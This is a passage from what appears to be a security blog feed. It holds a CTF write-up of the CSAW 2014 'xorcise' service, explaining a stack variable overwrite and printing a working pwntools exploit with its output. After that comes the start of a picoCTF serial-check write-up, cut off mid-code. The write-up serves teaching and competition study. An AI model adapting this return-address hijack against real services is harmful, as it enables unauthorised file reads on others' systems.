00 00 00 00 00 00 00 00 00 00</span></span> <span class="giallo-l"><span> 0x0c627fffcf90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span></span> <span class="giallo-l"><span> 0x0c627fffcfa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span></span> <span class="giallo-l"><span> 0x0c627fffcfb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span></span> <span class="giallo-l"><span>=&gt;0x0c627fffcfc0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span> 0x0c627fffcfd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span> 0x0c627fffcfe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span> 0x0c627fffcff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span> 0x0c627fffd000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span> 0x0c627fffd010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa</span></span> <span class="giallo-l"><span>Shadow byte legend (one shadow byte represents 8 application bytes):</span></span> <span class="giallo-l"><span> Addressable: 00</span></span> <span class="giallo-l"><span> Partially addressable: 01 02 03 04 05 06 07</span></span> <span class="giallo-l"><span> Heap left redzone: fa</span></span> <span class="giallo-l"><span> Freed heap region: fd</span></span> <span class="giallo-l"><span> Stack left redzone: f1</span></span> <span class="giallo-l"><span> Stack mid redzone: f2</span></span> <span class="giallo-l"><span> Stack right redzone: f3</span></span> <span class="giallo-l"><span> Stack after return: f5</span></span> <span class="giallo-l"><span> Stack use after scope: f8</span></span> <span class="giallo-l"><span> Global redzone: f9</span></span> <span class="giallo-l"><span> Global init order: f6</span></span> <span class="giallo-l"><span> Poisoned by user: f7</span></span> <span class="giallo-l"><span> Container overflow: fc</span></span> <span class="giallo-l"><span> Array cookie: ac</span></span> <span class="giallo-l"><span> Intra object redzone: bb</span></span> <span class="giallo-l"><span> ASan internal: fe</span></span> <span class="giallo-l"><span> Left alloca redzone: ca</span></span> <span class="giallo-l"><span> Right alloca redzone: cb</span></span> <span class="giallo-l"><span> Shadow gap: cc</span></span> <span class="giallo-l"><span>==12481==ABORTING</span></span></code></pre> 2014-09-21T00:00:00+00:00 2014-09-21T00:00:00+00:00 https://ekse.github.io/blog/csaw-xorcise-writeup/ <p>The <a rel="nofollow noreferrer external" href="https://ctftime.org/event/152/tasks/">CSAW 2014</a> Exploit500 challenge was a Linux 32-bit network service for which the executable and the source code were provided (I saved a copy of the source code <a rel="nofollow noreferrer external" href="https://github.com/ekse/code/blob/master/ctf/csaw2014/exploit500/xorcise.c">here</a>). The service accepts packets defined by the structure cipher_data and first applies a decryption loop to the received data.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="c"><span class="giallo-l"><span style="color: #81A1C1;">struct</span><span> cipher_data</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">{</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> uint8_t</span><span> length</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> uint8_t</span><span> key</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">8</span><span style="color: #ECEFF4;">]</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> uint8_t</span><span> bytes</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">128</span><span style="color: #ECEFF4;">]</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;">typedef struct</span><span> cipher_data cipher_data</span><span style="color: #81A1C1;">;</span></span></code></pre> <p>The service provides multiple commands, however the 2 interesting ones <code>read_file</code> and <code>system</code> require your packet to be authenticated. The authentication verification is done in <code>is_authenticated()</code> and computes an authentication checksum based on a password read from the local file 'password.txt'. This check does not seem to be vulnerable.</p> <p>My teammate EiNSTeiN_ discovered that there is a flaw in the <code>decipher()</code> method that does the decryption of the data. The function allocates a buffer <code>buf</code> which will contain the decrypted data, the allocated size is <code>MAX_BLOCKS * BLOCK_SIZE</code> which is 128 bytes. The copy of the packet bytes to the buffer is done safely with memcpy.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="c"><span class="giallo-l"><span style="color: #5E81AC;font-weight: bold;">#</span><span style="color: #81A1C1;">define</span><span style="color: #88C0D0;"> BLOCK_SIZE</span><span style="color: #B48EAD;"> 8</span></span> <span class="giallo-l"><span style="color: #5E81AC;font-weight: bold;">#</span><span style="color: #81A1C1;">define</span><span style="color: #88C0D0;"> MAX_BLOCKS</span><span style="color: #B48EAD;"> 16</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">[</span><span>...</span><span style="color: #ECEFF4;">]</span></span> <span class="giallo-l"><span style="color: #88C0D0;">memcpy</span><span style="color: #ECEFF4;">(</span><span>buf</span><span style="color: #ECEFF4;">,</span><span> data</span><span style="color: #81A1C1;">-&gt;</span><span>bytes</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> sizeof</span><span style="color: #ECEFF4;">(</span><span>buf</span><span style="color: #ECEFF4;">))</span><span style="color: #81A1C1;">;</span></span></code></pre> <p>There is also a check to ensure that the decryption loop does not process more than the size of <code>buf[]</code>.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="c"><span class="giallo-l"><span style="color: #81A1C1;">if</span><span style="color: #ECEFF4;"> ((</span><span>data</span><span style="color: #81A1C1;">-&gt;</span><span>length </span><span style="color: #81A1C1;">/</span><span> BLOCK_SIZE</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;"> &gt;</span><span> MAX_BLOCKS</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">{</span></span> <span class="giallo-l"><span> data</span><span style="color: #81A1C1;">-&gt;</span><span>length</span><span style="color: #81A1C1;"> =</span><span> BLOCK_SIZE </span><span style="color: #81A1C1;">*</span><span> MAX_BLOCKS</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span></span></code></pre> <p>But this check is flawed because of rounding; we can pass a value of 135 which will pass the check (135 / 8 equals 16 which is not bigger than <code>MAX_BLOCKS</code>). The decryption loop is applied by blocks of 8 bytes, so we are able to apply it to 8 bytes outside the bounds of <code>buf[]</code>.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="c"><span class="giallo-l"><span style="color: #81A1C1;">for</span><span style="color: #ECEFF4;"> (</span><span>loop </span><span style="color: #81A1C1;">=</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">;</span><span> loop </span><span style="color: #81A1C1;">&lt;</span><span> data</span><span style="color: #81A1C1;">-&gt;</span><span>length</span><span style="color: #81A1C1;">;</span><span> loop </span><span style="color: #81A1C1;">+=</span><span style="color: #B48EAD;"> 8</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">{</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> for</span><span style="color: #ECEFF4;"> (</span><span>block_index </span><span style="color: #81A1C1;">=</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">;</span><span> block_index </span><span style="color: #81A1C1;">&lt;</span><span style="color: #B48EAD;"> 8</span><span style="color: #81A1C1;">; ++</span><span>block_index</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> {</span></span> <span class="giallo-l"><span> buf</span><span style="color: #ECEFF4;">[</span><span>loop</span><span style="color: #81A1C1;">+</span><span>block_index</span><span style="color: #ECEFF4;">]</span><span style="color: #81A1C1;"> ^=</span><span style="color: #ECEFF4;"> (</span><span>xor_mask</span><span style="color: #81A1C1;">^</span><span>data</span><span style="color: #81A1C1;">-&gt;</span><span>key</span><span style="color: #ECEFF4;">[</span><span>block_index</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> }</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span></span></code></pre> <p>If we look at the stack layout of <code>decipher()</code> we see that those 8 bytes are the variables <code>xor_mask</code>, <code>block_index</code> and the first 3 bytes of loop.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>-00000095 buf db 128 dup(?)</span></span> <span class="giallo-l"><span>-00000015 xor_mask db ?</span></span> <span class="giallo-l"><span>-00000014 block_index dd ?</span></span> <span class="giallo-l"><span>-00000010 loop dd ?</span></span></code></pre><h2 id="exploitation-strategy">Exploitation Strategy</h2> <p>The strategy I went for is to modify the value of <code>loop</code> to make it point on the return address of <code>decipher()</code> and modify its 2 first bytes to make it return somewhere else. Hopefully we can find an interesting place to jump to.</p> <p>Let's go through the modification of the bytes one at a time. The first one is <code>xor_mask</code>. At this point <code>block_index</code> equals 0. We know 2 of the values in the decryption (<code>xor_mask</code> = 0x8F and <code>buf[loop+block_index]</code> = 0x8F), so we can set <code>key[block_index]</code> to get the output value we want. Let's set <code>xor_mask</code> to 0 to make the next steps easier. <code>0x8F ^ 0x8F ^ 0x00</code> equals 0x00, so this is the value we will put at <code>key[0]</code>.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>variable: prev_val block_index new_val key_value</span></span> <span class="giallo-l"><span>xor_mask: 0x8F 0 0x00 key[0] = 0x00</span></span></code></pre> <p>Next up is the first byte of <code>block_index</code>, at this point it is equal to 1. We will keep its value at 1 so the decryption loop continues normally. As we have modified <code>xor_mask</code> to 0x00, the computation is now <code>0x01 ^ 0x01 ^ 0x00</code> which equals 0x00, we put this value in <code>key[1]</code>. We will also leave the other bytes of <code>block_index</code> unchanged. Here is the updated table:</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>variable : prev_val block_index new_val key_value</span></span> <span class="giallo-l"><span>xor_mask : 0x8F 0 0x00 key[0] = 0x00</span></span> <span class="giallo-l"><span>block_index[0] : 0x01 1 0x01 key[1] = 0x00</span></span> <span class="giallo-l"><span>block_index[1] : 0x00 2 0x00 key[2] = 0x00</span></span> <span class="giallo-l"><span>block_index[2] : 0x00 3 0x00 key[3] = 0x00</span></span> <span class="giallo-l"><span>block_index[3] : 0x00 4 0x00 key[4] = 0x00</span></span></code></pre> <p>We can now modify the first byte of <code>loop</code>. Its current value is 0x80 (128), the value we need to make <code>buf[loop+block_index]</code> modify the return address at this point is 0x93, so that will give us <code>key[5] = 0x13</code>.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>variable: prev_val block_index new_val key_value</span></span> <span class="giallo-l"><span>loop[0] : 0x80 5 0x93 key[5] = 0x13</span></span></code></pre> <p>We are now able to modify the return address of <code>decipher()</code>, we're making good progress. So where do we want to make the program jump? There is a call to <code>read_file()</code> in <code>process_connection()</code>, this command reads the content of a file and sends its content back to us, we could use it to read the content of 'password.txt'.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>.text:08049279 mov eax, [ebp+var_10]</span></span> <span class="giallo-l"><span>.text:0804927C add eax, 8</span></span> <span class="giallo-l"><span>.text:0804927F sub esp, 8</span></span> <span class="giallo-l"><span>.text:08049282 push eax</span></span> <span class="giallo-l"><span>.text:08049283 push offset aReadFileReques ; &quot;Read File Request: %s\n&quot;</span></span> <span class="giallo-l"><span>.text:08049288 call _printf</span></span> <span class="giallo-l"><span>.text:0804928D add esp, 10h</span></span> <span class="giallo-l"><span>.text:08049290 mov eax, [ebp+var_10]</span></span> <span class="giallo-l"><span>.text:08049293 add eax, 8</span></span> <span class="giallo-l"><span>.text:08049296 sub esp, 8</span></span> <span class="giallo-l"><span>.text:08049299 push eax ; filename</span></span> <span class="giallo-l"><span>.text:0804929A push [ebp+fd] ; fd</span></span> <span class="giallo-l"><span>.text:0804929D call read_file</span></span></code></pre> <p>There is a little detail to keep in mind, there is a stack adjustment after the call to <code>decipher()</code>. As we are hijacking the return address the stack will not be properly readjusted.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>.text:0804918F call decipher</span></span> <span class="giallo-l"><span>.text:08049194 add esp, 10h</span></span> <span class="giallo-l"><span>;274 packet = (request *)&amp;decrypted;</span></span> <span class="giallo-l"><span>.text:08049197 lea eax, [ebp+var_11D]</span></span> <span class="giallo-l"><span>.text:0804919D mov [ebp+var_10], eax</span></span></code></pre> <p>My first thought was to jump at <code>0x0804928D</code> which does the same stack adjustment and then sets the correct parameters for the call to <code>read_file()</code>. However this approach does not work as the value of <code>var_10</code> is set only after the call to <code>decipher()</code>. Bummer.</p> <p>I then noticed that the address of <code>filename</code> is passed via eax at <code>0x08049299</code> and by luck at the end of <code>decipher()</code> eax points inside <code>buf[]</code>. So the last thing I needed to do was to adjust the initial packet content so that it contained <code>password.txt\x00' XOR 0x8F XOR the key</code>. Here is the final content of the variable smashing table.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>variable : prev_val block_index new_val key_value</span></span> <span class="giallo-l"><span>xor_mask : 0x8F 0 0x00 key[0] = 0x00</span></span> <span class="giallo-l"><span>block_index[0] : 0x01 1 0x01 key[1] = 0x00</span></span> <span class="giallo-l"><span>block_index[1] : 0x00 2 0x00 key[2] = 0x00</span></span> <span class="giallo-l"><span>block_index[2] : 0x00 3 0x00 key[3] = 0x00</span></span> <span class="giallo-l"><span>block_index[3] : 0x00 4 0x00 key[4] = 0x00</span></span> <span class="giallo-l"><span>loop[0] : 0x80 5 0x93 key[5] = 0x13</span></span> <span class="giallo-l"><span>at this point buf[loop+block_index] overwrites retaddr</span></span> <span class="giallo-l"><span>retaddr[1] : 0x94 6 0x99 key[6] = 0x0d</span></span> <span class="giallo-l"><span>retaddr[2] : 0x91 7 0x92 key[7] = 0x03</span></span></code></pre><h2 id="putting-it-all-together">Putting it all together</h2> <p>Below is the source code of my exploit, I used the <a rel="nofollow noreferrer external" href="https://github.com/Gallopsled/pwntools">pwntools</a> python library by Gallopsled which saved me a ton of time, definitely check it out.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="python"><span class="giallo-l"><span style="color: #81A1C1;">from</span><span> pwn</span><span style="color: #81A1C1;"> import *</span></span> <span class="giallo-l"><span style="color: #616E88;">#sock = remote(&quot;127.0.0.1&quot;, 24001)</span></span> <span class="giallo-l"><span>sock</span><span style="color: #81A1C1;"> =</span><span style="color: #88C0D0;"> remote</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">128.238.66.227</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #B48EAD;"> 24001</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>key</span><span style="color: #81A1C1;"> =</span><span style="color: #ECEFF4;"> &quot;</span><span style="color: #EBCB8B;">\x00\x00\x00\x00\x00\x13\x0d\x03</span><span style="color: #ECEFF4;">&quot;</span></span> <span class="giallo-l"><span>packet</span><span style="color: #81A1C1;"> =</span><span style="color: #ECEFF4;"> &quot;&quot;</span></span> <span class="giallo-l"><span>packet</span><span style="color: #81A1C1;"> +=</span><span style="color: #88C0D0;"> chr</span><span style="color: #ECEFF4;">(</span><span style="color: #B48EAD;">135</span><span style="color: #ECEFF4;">)</span><span style="color: #616E88;"> # cipher_data.length = 135</span></span> <span class="giallo-l"><span>packet</span><span style="color: #81A1C1;"> +=</span><span> key</span><span style="color: #616E88;"> # key</span></span> <span class="giallo-l"><span>packet</span><span style="color: #81A1C1;"> +=</span><span style="color: #ECEFF4;"> &quot;</span><span style="color: #A3BE8C;">A</span><span style="color: #ECEFF4;">&quot;</span></span> <span class="giallo-l"><span style="color: #616E88;">#packet += xor(xor(&quot;password.txt\x00&quot;, &quot;\x00\x00\x00\x00\x13\x0d\x03\x00&quot;), 0x8f)</span></span> <span class="giallo-l"><span>packet</span><span style="color: #81A1C1;"> +=</span><span style="color: #88C0D0;"> xor</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">xor</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">flag.txt</span><span style="color: #EBCB8B;">\x00</span><span style="color: #ECEFF4;">&quot;, &quot;</span><span style="color: #EBCB8B;">\x00\x00\x00\x00\x13\x0d\x03\x00</span><span style="color: #ECEFF4;">&quot;),</span><span style="color: #81A1C1;"> 0x</span><span style="color: #B48EAD;">8f</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>packet</span><span style="color: #81A1C1;"> +=</span><span style="color: #ECEFF4;"> &quot;</span><span style="color: #A3BE8C;">A</span><span style="color: #ECEFF4;">&quot;</span><span style="color: #81A1C1;">*</span><span style="color: #ECEFF4;"> (</span><span style="color: #B48EAD;">140</span><span style="color: #81A1C1;"> -</span><span style="color: #88C0D0;"> len</span><span style="color: #ECEFF4;">(</span><span>packet</span><span style="color: #ECEFF4;">))</span></span> <span class="giallo-l"><span>sock</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">send</span><span style="color: #ECEFF4;">(</span><span>packet</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>sock</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">interactive</span><span style="color: #ECEFF4;">()</span></span></code></pre> <p>And finally the exploit in action :</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>[ekse@xubuntu] : ~/csaw/exploit500 $ python client.py</span></span> <span class="giallo-l"><span>[+] Opening connection to 127.0.0.1 on port 24001: OK</span></span> <span class="giallo-l"><span>[*] Switching to interactive mode</span></span> <span class="giallo-l"><span>pass123</span></span> <span class="giallo-l"><span>[*] Got EOF while reading in interactive</span></span></code></pre> <p>So the password was 'pass123'. It was kind of depressing to have worked so much for such a weaksauce password, the CSAW CTF organizers really are a bunch of trolls. Now we could implement the packet authentication and call the system command to list the files on the server, but I guessed the flag was probably in 'flag.txt' and used the exploit to read that file instead :-)</p> <p>The flag was <code>flag{code_exec&gt;=crypto_break}</code>.</p> <p>Thanks to drraid for this great challenge and to the CSAW organizers for such a great CTF!</p> 2014-08-10T00:00:00+00:00 2014-08-10T00:00:00+00:00 https://ekse.github.io/blog/picoctf-harder-serial-writeup/ <p>In the past weeks I have been watching LiveCTF, a project to livestream speedruns of wargames and CTF challenges. This is a great learning tool as you get to see the thought process of the caster as well as the tools and tricks they use to solve the challenges.</p> <p>I also recently learned about picoCTF, a capture the flag game made for high school teams organized by PPP. I have been playing the 2013 edition in the last few days and it is actually really well made, for someone new to CTF I would definitely recommend starting with this one. It also has interesting challenges even for seasoned CTF players.</p> <p>I decided to try to speedrun picoCTF and focus on optimizing my work process when going through the challenges. In this post I will show how to solve the 'Harder Serial' challenge using Z3.</p> <p><img src="/assets/pico.png" alt="pico ctf" /></p> <h2 id="the-challenge">The challenge</h2> <p>Harder Serial comes in the form of a Python script, we need to find a working serial for the RoboCorpIntergalactic software. The full script code is below.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="python"><span class="giallo-l"><span style="color: #616E88;">#!/usr/bin/env python</span></span> <span class="giallo-l"><span style="color: #616E88;"># Looks like the serial number verification for space ships is similar to that</span></span> <span class="giallo-l"><span style="color: #616E88;"># of your robot. Try to find a serial that verifies for this space ship</span></span> <span class="giallo-l"><span style="color: #81A1C1;">import</span><span> sys</span></span> <span class="giallo-l"><span style="color: #88C0D0;">print</span><span style="color: #ECEFF4;"> (&quot;</span><span style="color: #A3BE8C;">Please enter a valid serial number from your RoboCorpIntergalactic purchase</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span style="color: #81A1C1;">if</span><span style="color: #88C0D0;"> len</span><span style="color: #ECEFF4;">(</span><span>sys</span><span style="color: #ECEFF4;">.</span><span>argv</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 2</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;"> (&quot;</span><span style="color: #A3BE8C;">Usage: </span><span style="color: #EBCB8B;">%s</span><span style="color: #A3BE8C;"> [serial number]</span><span style="color: #ECEFF4;">&quot;</span><span style="color: #81A1C1;">%</span><span>sys</span><span style="color: #ECEFF4;">.</span><span>argv</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">0</span><span style="color: #ECEFF4;">])</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> exit</span><span style="color: #ECEFF4;">()</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #88C0D0;">print</span><span style="color: #ECEFF4;"> (&quot;</span><span style="color: #A3BE8C;">#&gt;</span><span style="color: #ECEFF4;">&quot;</span><span style="color: #81A1C1;"> +</span><span> sys</span><span style="color: #ECEFF4;">.</span><span>argv</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">]</span><span style="color: #81A1C1;"> +</span><span style="color: #ECEFF4;"> &quot;</span><span style="color: #A3BE8C;">&lt;#</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span style="color: #81A1C1;">def</span><span style="color: #88C0D0;"> check_serial</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">):</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #ECEFF4;"> (</span><span style="color: #81A1C1;">not</span><span style="color: #88C0D0;"> set</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">).</span><span style="color: #88C0D0;">issubset</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">set</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">map</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">str</span><span style="color: #ECEFF4;">,</span><span style="color: #88C0D0;">range</span><span style="color: #ECEFF4;">(</span><span style="color: #B48EAD;">10</span><span style="color: #ECEFF4;">))))):</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> print</span><span style="color: #ECEFF4;"> (&quot;</span><span style="color: #A3BE8C;">only numbers allowed</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> len</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 20</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">15</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> +</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">4</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 10</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> *</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">18</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 2</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">15</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> /</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">9</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 1</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">17</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> -</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">0</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 4</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">5</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> -</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">17</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> != -</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">15</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> -</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 5</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> *</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">10</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 18</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">8</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> +</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">13</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 14</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">18</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> *</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">8</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 5</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">4</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> *</span><span style="color: #88C0D0;"> int</span><span style="color: #ECEFF4;">(</span><span>serial</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">11</span><span style="color: #ECEFF4;">])</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> return False</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #88C0D0;"> int</span><span style="color: 